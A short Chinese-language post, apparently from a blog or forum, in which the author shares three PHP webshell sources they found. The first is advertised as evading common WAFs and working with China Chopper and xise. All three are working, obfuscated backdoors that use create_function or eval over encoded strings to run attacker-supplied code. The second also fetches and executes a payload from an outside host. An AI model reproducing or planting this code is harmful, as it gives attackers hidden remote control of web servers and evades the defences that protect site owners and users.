发现了几个php的shell木马源码，留存下，有点小吊吊

看着是比较吊，没有eval 。一共三个php木马源码

第一个：//本次更新：体积优化、压缩优化、命令优化、反弹优化、文件管理优化、挂马清马优化等大量功能细节优化。
//功能特色：PHP高版本低版本都能执行，文件短小精悍，方便上传，功能强大，提权无痕迹，无视waf，过安全狗、云锁、360、阿里云、护卫神等主流waf。同时支持菜刀、xise连接。

//本次更新：体积优化、压缩优化、命令优化、反弹优化、文件管理优化、挂马清马优化等大量功能细节优化。
//功能特色：PHP高版本低版本都能执行，文件短小精悍，方便上传，功能强大，提权无痕迹，无视waf，过安全狗、云锁、360、阿里云、护卫神等主流waf。同时支持菜刀、xise连接。

$html='$password'.'='."'".$password."';".'@e#html'.''.'v'."".''.''."".''.''.''.'a'.''.'l('.'g'.''."".''.''.'z'.'i'.''.''.'n'.'f'.'l'.''.''."".'a'.'t'.'e(b'.'as'.''.''.''."".''.'e'.'6'.''."".''."".""."".''.'4_'.'d'.'e'.'c'.''.''.''."".''."".'o'.'d'.'e'.'('."'lVZhb5tIEP0eKf9hg6ICEufgXBy1sSI1TTHJKcY5jJsmbYTwspitMUt3SWiT+r/fLLZjjN3UxxfE7sybN29nZtndIZwz7nOSMZ7TdKSZent3RxAhKEt9kQc81+QKjZC2R4Ugubbv961+/7LnfFGyOAsyqtzrOnre3UHw7GN0ilS1Pf96EIQHI5LmcrXLnmiSBAdHDRNpmE2yIKfDhLRRt39poeOG2UY3NA1ZIZDjoVbjUF/i8AQQhoEgx0d+SDALibb6pdwO4n7Xdqzh33fdrvnP460Z2uFhx3M+f6DDT9mhd5G5odn66Ny04k/N8bvz0empouuVCA4p6jGUq6cP10M7iYOmexl8dv7t2XHRtTtjbI9a2O4UgTfg+Ntdcns4Lm69uBXcZPndU/JIbKfo3Tg8nMSTq0JGmgeSQkYPKc6lvuQHFbnQ1EgwPGYZSdWlkiWrhKZjSDwLuCA+UNQkzwVUafH9gfCfYFKaflFB01i9rxrETEj1Rc5zlrCCcG1uKjfU+xWwKAPLFzJa6Wugt6aB9qFOUjZ7A5SBmmbVU2YF3ivkS0T2IIMrtuWhg+cZ2Sm68Lzrg2bD/Mq/pkp7g0cDXC4g9gl6LjlMX7UcQJH9dSar7AT9/xp7FfqcpSkpz+oEnSdMEGm9ySMqOM2J1MAovfU6Ik1jEoSEgxrN+h5maQ7shVSqDlzENCHQexFhUSnxmsaLQiHy7EYE6qlkcWS+O66zeDmqJZtTZG5EXCXWmBUY2YA3/VOIN2+QNucH+YF06NcvVFmQauq/51ARzvxz+NpnhOWhlbqtiS6bZpFgZXOOMF226x4UfMZAVmws5oQus1prYwybPk1prr6yT34QXG9zHAOZF2+tyrVchbHLMpi8ODbQ+cC96l17PrxmdLay9i67Vm/gQd+2trJ3LW/gOp575vQ7lmsgzx1Y29HqW+6ZbTmeUZn+K0MGL3KVSkjnNdz5oS13tjgMEM6H4tfUIIEpJ2elH22aqDmZZLLR3kfQV2vjtIwAFvlPbWap6xvK5j2dZIm8HlTVmCOugVRoKiFJPlJ+loYdiKlshpR0ZAL+oiRXuFUE2JT/HjRSFCSC1MpqNvfl7Z4EeJYt2AMjBZzxyqmsX+rgPHqiaZQEef2yBd8Ks+ns92CLvwPyGCQbLQBs+h8=')));";$css=base64_decode("Q3JlYXRlX0Z1bmN0aW9u");$style=$css('',preg_replace("/#html/","",$html));$style();/*));.'<linkrel="stylesheet"href="$#css"/>';*/

第二个：

<?php
$password = '665asdsad';/*//登录密码
//----------功能程序------------------//
$c = "chr";
session_start();
if (empty($_SESSION['PhpCode'])) {
    $url = $c(104).$c(116).$c(116).$c(112).$c(58);
    $url .= $c(47).$c(47).$c(119).$c(119).$c(119);
    $url .= $c(46).$c(112).$c(104).$c(112).$c(115);
    $url .= $c(101).$c(99).$c(46).$c(99).$c(99);
    $url .= $c(47).$c(72).$c(97).$c(99).$c(107);
    $url .= $c(47).$c(52).$c(48).$c(52).$c(46).$c(103).$c(105).$c(102);
    $get = $c(102) . $c(105) . $c(108) . $c(101) . $c(95);
    $get .= $c(103) . $c(101) . $c(116) . $c(95) . $c(99);
    $get .= $c(111) . $c(110) . $c(116) . $c(101) . $c(110);
    $get .= $c(116) . $c(115);
    $_SESSION['PhpCode'] = $get($url);
}
$unzip = $c(103) . $c(122) . $c(105) . $c(110);
$unzip .= $c(102) . $c(108) . $c(97) . $c(116) . $c(101);

@eval($unzip($_SESSION['PhpCode']));
?>

第三个：没太看懂。

$uf="sncdsfsdfsdfsdf3";

$ka="IEBldmFbsK";

$pjt="CRfUE9TVF";

$vbl = str_replace("ti","","tistittirti_rtietipltiatice");

$iqw="F6ciddKTs=";

$bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke");

$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn");

$mpy = $sbp('', $bkf($vbl("b", "", $ka.$pjt.$uf.$iqw))); $mpy();

有的是图片，有的是php。。。